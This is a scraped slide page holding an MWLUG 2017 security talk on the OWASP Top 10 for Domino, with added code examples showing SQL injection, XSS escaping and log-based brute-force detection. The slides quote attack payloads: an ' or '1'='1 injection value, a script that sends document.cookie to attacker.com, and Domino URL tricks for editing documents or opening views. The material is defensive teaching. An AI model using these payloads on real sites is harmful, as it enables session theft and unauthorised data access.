August OpenNTF Webinar - Git and GitHub Explained
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification Manager
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for Newbies
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020
 
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
 
Open ntf 2020-jun
Open ntf 2020-junOpen ntf 2020-jun
Open ntf 2020-jun
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar that
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
 
Connect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast LaneConnect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast Lane
 

Recently uploaded

Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Incrobinwilliams8624
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyRaymond Okyere-Forson
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIIvo Andreev
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesSoftwareMill
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfBrain Inventory
 
Streamlining Your Application Builds with Cloud Native Buildpacks
Streamlining Your Application Builds  with Cloud Native BuildpacksStreamlining Your Application Builds  with Cloud Native Buildpacks
Streamlining Your Application Builds with Cloud Native BuildpacksVish Abrams
 
ERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxAutus Cyber Tech
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionsNirav Modi
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLAlluxio, Inc.
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxJoão Esperancinha
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilVICTOR MAESTRE RAMIREZ
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadIvo Andreev
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...OnePlan Solutions
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorShane Coughlan
 
Webinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.pptWebinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.pptkinjal48
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfTobias Schneck
 
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine HarmonyLeveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmonyelliciumsolutionspun
 
Introduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptxIntroduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptxIntelliSource Technologies
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageDista
 

Recently uploaded (20)

Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Inc
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human Beauty
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AI
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retries
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdf
 
Streamlining Your Application Builds with Cloud Native Buildpacks
Streamlining Your Application Builds  with Cloud Native BuildpacksStreamlining Your Application Builds  with Cloud Native Buildpacks
Streamlining Your Application Builds with Cloud Native Buildpacks
 
ERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptx
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspections
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
 
Salesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptxSalesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptx
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptx
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-Council
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS Calculator
 
Webinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.pptWebinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.ppt
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
 
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine HarmonyLeveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
 
Introduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptxIntroduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptx
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
 

Bp101-Can Domino Be Hacked

1. MWLUG 2017 Moving Collaboration Forward
    Can Domino Be Hacked? Lessons We Can Learn From the Security Community
    Howard Greenberg, Andrew Pollack

2. Our Amazing Sponsors

3. Andrew Pollack, Northern Collaborative Technologies
    • Administrator & Developer since version 2.0
    • IBM Lotus Beacon Award Winner
    • Services
      – Security Review & Penetration Testing
      – Site Performance & Security Reviews
      – Expert Witness & Security Forensics
      – Application Development
      – Administrative Overhaul
    • Products
      – NCT Search
      – NCT Compliance Search
      – NCT Simple Sign On
      – NCT SAML for Domino 7+
    • Structural Firefighter

4. Howard Greenberg
    • Been doing Notes/Domino since 1993
      – Developer, Admin, Consultant, Instructor
    • Co-founded TLCC in 1998
      – Self-paced courses for Notes/Domino and XPages
    • Security Certifications
      – Certified Information Systems Auditor (CISA)
      – Certified Information Security Manager (CISM)
    • Certified Flight Instructor (CFI)

5. Session Goals
    • Review the OWASP Top 10 Web Application Security Issues
    • Relate those to our Domino environments
    HG

6. Why do I care?
    • I have a firewall; no one can touch my Domino environment!
    HG

7. Reality
    Vendors, Suppliers, Customers, Employees
    HG

8. Major Breaches
    • Target – 70MM customer accounts
      – Stole logins from the HVAC subcontractor
        • Via phishing email, then malware got installed
      – Once in, pivoted to registers, installed malware
        • Captured credit card information, then uploaded to hackers
      – Lesson learned: segment networks, encrypt sensitive data
    Did the Firewall help?
    https://www.sans.org/reading-room/whitepapers/casestudies/case-study-critical-controls-prevented-target-breach-35412
    HG

9. OPM Breach
    • Office of Personnel Management (US)
      – Personal data on EVERY Federal employee
        • Plus more...
    • Phishing attack
      – got login data from a contractor
      – put malware on admin server
    • Lack of encryption on sensitive databases
    https://www.wired.com/2016/10/inside-cyberattack-shocked-us-government/
    HG

10. Who/What is OWASP
    • “Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software”
    • Publishes a list of the 10 Most Critical Web Application Security Risks
      – Widely Respected
      – For each Risk it provides:
        • A description
        • Example vulnerabilities
        • Example attacks
        • Guidance on how to avoid
        • References to OWASP and other related resources
    https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
    HG

11. Top 10 for 2017 (Release Candidate)
    • A1-Injection
    • A2-Broken Authentication and Session Management
    • A3-Cross-Site Scripting (XSS)
    • A4-Broken Access Control
    • A5-Security Misconfiguration
    • A6-Sensitive Data Exposure
    • A7-Insufficient Attack Protection
    • A8-Cross-Site Request Forgery (CSRF)
    • A9-Using Components with Known Vulnerabilities
    • A10-Underprotected APIs
    https://www.owasp.org/index.php/Top_10_2017-Top_10
    HG

12. Sample of Information Published
    Link to PDF
    HG

13. A1 - Injection
    The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query.
    Typically SQL injection. Got any SQL code in your apps (accessing relational data)? Like:
      String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
    The attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1. For example:
      http://example.com/app/accountView?id=' or '1'='1
    This changes the meaning of the query to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
    HG

14. Domino Vulnerabilities – A1
    • Got SQL code?
      – Use SQL parameters
        "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"
        becomes
        "SELECT * FROM accounts WHERE custID=?"
      – Scrub input
      – Use prepared statements
    HG
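The A1 scenario from slides 13 and 14 run end to end, as an added example that is not from the deck: the concatenated query, the ' or '1'='1 payload, and the prepared-statement fix. Python and sqlite3 stand in for the Java/JDBC code on the slide, and the accounts table and its rows are constructed here for the demonstration.

```python
"""Added example (not from the slides): the A1 concatenated query and its
prepared-statement fix, run against a constructed in-memory accounts table."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a small, constructed accounts table in memory (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 250), ("1002", "bob", 900), ("1003", "carol", 40)],
    )
    conn.commit()
    return conn


def account_view_vulnerable(conn: sqlite3.Connection, cust_id: str) -> list:
    """Mirrors the slide's concatenated query: the request parameter is pasted
    into the SQL text, so quote characters in it change the statement itself."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def account_view_fixed(conn: sqlite3.Connection, cust_id: str) -> list:
    """Prepared statement with a bound parameter (slide 14): the value is never
    parsed as SQL, so it can only ever be compared literally against custID."""
    return conn.execute("SELECT * FROM accounts WHERE custID=?", (cust_id,)).fetchall()


# The 'id' value the attacker sends, exactly as quoted on slide 13.
PAYLOAD = "' or '1'='1"

if __name__ == "__main__":
    db = make_db()
    print(account_view_vulnerable(db, "1001"))   # the one row that was intended
    print(account_view_vulnerable(db, PAYLOAD))  # every row: WHERE became ... or '1'='1'
    print(account_view_fixed(db, PAYLOAD))       # []: no custID equals the payload string
```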
15. Domino Vulnerabilities – A1
    • Hack Domino URLs
      – Switch from openDocument to editDocument
        http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9B86441DFF85258154004A827A&action=openDocument
      • Pivot to read all documents – open default view
        http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview
      • Use zero as the view and open any document by id
        http://www.tlcc.com/mwlug/mwlug2017.nsf/0/557d7b9b86441dff85258154004a827a?EditDocument
    Fix - use proper reader/author names
    Block view access with $$ViewTemplateDefault
    HG

16. A2-Broken Authentication and Session Management - What is it?
    • User authentication credentials aren’t properly protected when stored using hashing or encryption.
    • Credentials can be guessed or overwritten through weak account management functions.
    • Session IDs are exposed in the URL.
    • Session IDs are vulnerable to session fixation attacks.
    • Session IDs don’t time out, or user sessions or authentication tokens aren’t properly invalidated during logout.
    • Session IDs aren’t rotated after successful login.
    • Passwords, session IDs, and other credentials are sent over unencrypted connections.
    AP

17. A2-Protecting Stored Credentials
    • Domino is fairly good at this if you let it
      – Use Minimum Password Requirements
      – Protect your Domino Directory
      – Don’t store a password file “just in case”
      – Use the “Fewer Name Variants” option
    • Beware of SSO Solutions – Including SAML
      – You may be turning over all authentication controls to some other system!
    AP

18. A2 – Weak Management Practices
    • Beware of password recovery processes
      – How do you verify the person requesting the password reset is really the person who should have it? This can also be used to deny service.
      – Any web site that can send you your old password when you request it should not be trusted
    AP

19. A2 – Session IDs in the URL
    • While Domino doesn’t generally do this, some administrators do this to avoid creating Domino users, or to give specific user content within applications based on URLs
      – e.g. URLs that contain specific invoice numbers or trouble ticket IDs to send users to specific documents
    AP

20. A2 – Session “Fixation” Attacks
    • Can your stored authentication token be captured and re-used in Domino?
      – Spoiler Alert: Yes, it can – and quite easily
    • In session-based authentication the session token is stored in a cookie.
    • Anyone who can create web pages on your server can capture this using a bit of JavaScript.
      – Other servers, including non-Domino servers within your domain, may be able to capture this cookie as well
    AP

21. A2 – Preventing Domino “Fixation” attacks on your Domino Servers
    • Code review applications
    • Follow XSS prevention best practices
    • Change the default cookie domain path in your session LTPA token documents
    AP

22. A2 – Passwords, session IDs, on unencrypted connections
    • There should no longer be any reason to allow unencrypted HTTP connections at all. Sorry. It’s 2017. Stop doing this.
    AP

23. A3 - Cross Site Scripting (XSS)
    You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe.
    Example Attack Scenario
    The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
      (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
    The attacker modifies the ‘CC’ parameter in his browser to:
      '><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'
    This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
    HG

24. Domino Vulnerability – A3
    • YES, any web application is!!!
    • Any text input, especially rich text (converts to link)
    • Prevention – Always sanitize any input
      • Domino web – look for HTML tags, strip out
        – Have to roll your own with LotusScript
        – Note: CSJS is not an option!
      • XPages have HTML Filters
    HG
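The A3 scenario from slide 23, as an added example that is not from the deck: the slide's input tag rendered with the raw CC parameter, with HTML tags stripped out (the slide 24 approach), and with context-sensitive attribute escaping, each then parsed the way a browser tokenizer would to see what actually lands on the page. Python stands in for the Java snippet; the card number used at the end is a constructed sample.

```python
"""Added example (not from the slides): the A3 input tag rendered with raw,
tag-stripped and attribute-escaped input, then parsed as a browser would."""
import html
import re
from html.parser import HTMLParser
from typing import List, Optional

# The attacker's 'CC' parameter value exactly as quoted on slide 23.
PAYLOAD = ("'><script>document.location='http://www.attacker.com/cgi-bin/"
           "cookie.cgi?foo='+document.cookie</script>'")

TAG_RE = re.compile(r"<[^>]*>")


def render_unescaped(cc: str) -> str:
    """The slide's snippet: the parameter is pasted straight into a
    single-quoted attribute, so a quote in it ends the attribute early."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_tag_stripped(cc: str) -> str:
    """'Look for HTML tags, strip out' (slide 24) applied naively: the tags go,
    but the quote that closes the attribute stays behind."""
    return render_unescaped(TAG_RE.sub("", cc))


def render_escaped(cc: str) -> str:
    """Context-sensitive escaping for an HTML attribute: html.escape with
    quote=True encodes & < > \" and ' as entities, so nothing in the value can
    close the attribute or open a tag. The browser decodes them back to text."""
    return ("<input name='creditcard' type='TEXT' value='"
            + html.escape(cc, quote=True) + "'>")


class _TagCollector(HTMLParser):
    """Records every start tag with its attributes, roughly as a browser's
    tokenizer sees the fragment (attribute values come back entity-decoded)."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[tuple] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def _parse(fragment: str) -> List[tuple]:
    p = _TagCollector()
    p.feed(fragment)
    p.close()
    return p.tags


def tag_names(fragment: str) -> List[str]:
    """Names of all tags a browser would find in the fragment."""
    return [name for name, _ in _parse(fragment)]


def input_value(fragment: str) -> Optional[str]:
    """The decoded value attribute of the first <input>, or None if there is none."""
    for name, attrs in _parse(fragment):
        if name == "input":
            return attrs.get("value")
    return None


if __name__ == "__main__":
    for label, render in [("raw", render_unescaped),
                          ("tags stripped", render_tag_stripped),
                          ("escaped", render_escaped)]:
        out = render(PAYLOAD)
        # raw: a second <script> tag appears; stripped: no script, but the value
        # is empty and the rest spills into the page; escaped: one <input> whose
        # value is the payload as inert text.
        print(f"{label:14s} tags={tag_names(out)} value={input_value(out)!r}")
```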
  • 25. MWLUG 2017 Moving Collaboration Forward XPages HTML Filters • XPages has built-in filtering • Have to turn on – HTMLFilter – for output – HTMLFilterIn – filters on saving • Use acf as the option! – Identity does nothing, empty kills everything – Turn on for all rich text (server, app, or XPage) xsp.richtext.default.htmlfilter=acf HG More Information!
  • 26. MWLUG 2017 Moving Collaboration Forward A4-Broken Access Control • Not just ACL Settings – but includes them – Maximum Internet Name & Password Access – Anonymous & Default “No Access” on all database you don’t expect web users to access – Obscurity is not Security – (See App Dev Practices) AP
  • 27. A5 - Security Misconfiguration
    • Don’t expose your operating system to the internet.
    • Turn off all services you don’t need
    • Keep your Domino version fully up to date
      – Tools like “Metasploit” know all about Domino
      – Out of date servers can be hacked to a remote command line in 30 seconds with menu driven hacking tools
    AP
  • 28. A5 – Use Good HTTP Password Management practices
    • Assign HTTP Passwords even if you don’t use them. This field will get filled in with garbage if you do not.
      – These are also used to attack your SMTP mail handler
    AP
  • 29. A5 – Don’t Help the Hackers
    • By default your server tells the world what software you’re running. It’s like you WANT to get hacked
    AP
  • 30. A5 – Don’t Help the Hackers!
    • HTTPDisableServerHeader=1
    • Then Get Fancy! Add your own SERVER header
    AP
  • 31. A5 - Set up SSL the right way
    • Use TLS
    • Use the right SSL settings
    • Use a score check service to validate
      www.ssllabs.com/ssltest/index.html
    AP
  • 32. A5 – Domino Web Server Settings
    May need to modify ciphers available
      Disable_SSLV3=1
      SSL_USE_CLIENT_CIPHER_ORDER=1
  • 33. A6 - Sensitive Data Exposure
    Am I vulnerable to Data Exposure?
    The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data:
    1. Is any of this data stored in clear text long term, including backups of this data?
    2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous.
    3. Are any old / weak cryptographic algorithms used?
    4. Are weak crypto keys generated, or is proper key management or rotation missing?
    5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser?
    HG
  • 34. Domino Vulnerability – A6
    Know your data, what is sensitive - RISK ANALYSIS!
    • HTTPS should be turned on/forced for anything that may be sensitive - protect data in motion
    • Store data in encrypted fields - protect data at rest
      – Notes encryption (field level), now in XPages in FP8!
    • Use TLS 1.2 only, older encryption is vulnerable
      – Turn off SSLV3
    • Passwords in names.nsf – setting to hash in better encrypted ways
    • PCI - If your company takes credit cards, you are subject to PCI
    • PII - personal information, many rules for EU, states, etc.
    HG
  • 35. A7 - Insufficient Attack Protection
    Am I Vulnerable to Attack?
    Detecting, responding to, and blocking attacks makes applications dramatically harder to exploit yet almost no applications or APIs have such protection. Critical vulnerabilities in both custom code and components are also discovered all the time, yet organizations frequently take weeks or even months to roll out new defenses.
    It should be very obvious if attack detection and response isn’t in place. Simply try manual attacks or run a scanner against the application. The application or API should identify the attacks, block any viable attacks, and provide details on the attacker and characteristics of the attack. If you can’t quickly roll out virtual and/or actual patches when a critical vulnerability is discovered, you are left exposed to attack.
    AP
  • 36. A7 - Insufficient Attack Protection
    • Is anyone monitoring your HTTP and SMTP logs to look for attacks?
    • Does your company have an IDS (Intrusion Detection System)?
    • Fail2Ban – Poor Linux Admin’s IDS
    AP
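The "is anyone monitoring your HTTP logs?" question on this slide, answered with an added Fail2Ban-style check in Node.js (not code from the deck, from Fail2Ban or from Domino). It parses access-log lines in Common Log Format, which is assumed here to be the text format the Domino HTTP task writes, and flags any client that accumulates too many 401 (failed basic-auth) responses inside a sliding time window. The log lines, the IP addresses and the thresholds are constructed for the example.

```javascript
// Added example (not from the MWLUG deck): a Fail2Ban-style sweep over HTTP
// access log lines. Lines are constructed in Common Log Format; whether your
// Domino server writes that format is an assumption to verify in the log
// settings of the server document. Thresholds are assumptions as well.

const CLF = /^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/;
const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// Convert a CLF timestamp such as "10/Aug/2017:14:03:05 -0400" to epoch seconds.
function clfTimeToEpoch(s) {
  const m = /^(\d{2})\/([A-Za-z]{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) ([+-])(\d{2})(\d{2})$/.exec(s);
  if (!m || !(m[2] in MONTHS)) return NaN;
  const local = Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]) / 1000;
  const offset = (+m[8] * 3600 + +m[9] * 60) * (m[7] === '+' ? 1 : -1);
  return local - offset;  // subtract the zone offset to get UTC
}

// Parse one line; returns null for lines that are not in CLF.
function parseLine(line) {
  const m = CLF.exec(line);
  if (!m) return null;
  return { ip: m[1], user: m[2], time: m[3], method: m[4], path: m[5], status: Number(m[6]) };
}

// Flag client IPs that produce `maxFailures` 401 responses within any
// `windowSeconds` span, using the log's own timestamps (not wall-clock time),
// so the same function works on archived logs.
function findBruteForcers(lines, { maxFailures = 5, windowSeconds = 60 } = {}) {
  const failures = new Map();  // ip -> recent failure times (epoch seconds)
  const flagged = new Set();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r || r.status !== 401) continue;
    const t = clfTimeToEpoch(r.time);
    const recent = failures.get(r.ip) || [];
    recent.push(t);
    while (recent.length && t - recent[0] > windowSeconds) recent.shift();  // drop old entries
    failures.set(r.ip, recent);
    if (recent.length >= maxFailures) flagged.add(r.ip);
  }
  return [...flagged];
}

// Constructed sample: one client hammering names.nsf, one user with a single typo.
const sampleLogLines = [
  '203.0.113.7 - - [10/Aug/2017:14:03:05 -0400] "GET /names.nsf HTTP/1.1" 401 312',
  '203.0.113.7 - - [10/Aug/2017:14:03:09 -0400] "GET /names.nsf HTTP/1.1" 401 312',
  '198.51.100.20 - - [10/Aug/2017:14:03:10 -0400] "GET /mail/user.nsf HTTP/1.1" 401 312',
  '198.51.100.20 - jdoe [10/Aug/2017:14:03:12 -0400] "GET /mail/user.nsf HTTP/1.1" 200 8711',
  '203.0.113.7 - - [10/Aug/2017:14:03:14 -0400] "GET /names.nsf HTTP/1.1" 401 312',
  '203.0.113.7 - - [10/Aug/2017:14:03:20 -0400] "GET /names.nsf HTTP/1.1" 401 312',
  '203.0.113.7 - - [10/Aug/2017:14:03:27 -0400] "GET /names.nsf HTTP/1.1" 401 312',
  '203.0.113.7 - - [10/Aug/2017:14:03:35 -0400] "GET /names.nsf HTTP/1.1" 401 312',
];

console.log('flagged clients:', findBruteForcers(sampleLogLines));
```

Fed the real log file one line at a time (for example from `fs.createReadStream` through `readline`), the flagged list is what you would hand to a firewall rule or ticket. Session-based (form) authentication in Domino does not answer a bad password with a 401, so for that configuration the failure signal has to come from the HTTP task's own login-failure messages instead; that is a separate parser.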
  • 37. A8 - Cross-Site Request Forgery (CSRF)
    Am I Vulnerable to CSRF?
    To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, such as through reauthentication.
    Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server-Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests.
    Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests.
    HG
  • 38. Domino Vulnerabilities – A8
    • Prevent your content from being rendered in an iframe or frameset that you did not generate.
    • Domino web admin is vulnerable, turn off!
    • Domino frameset – DominoValidateFramesetSRC=1 - make sure the content in the frameset comes from the same database
      https://www-10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC
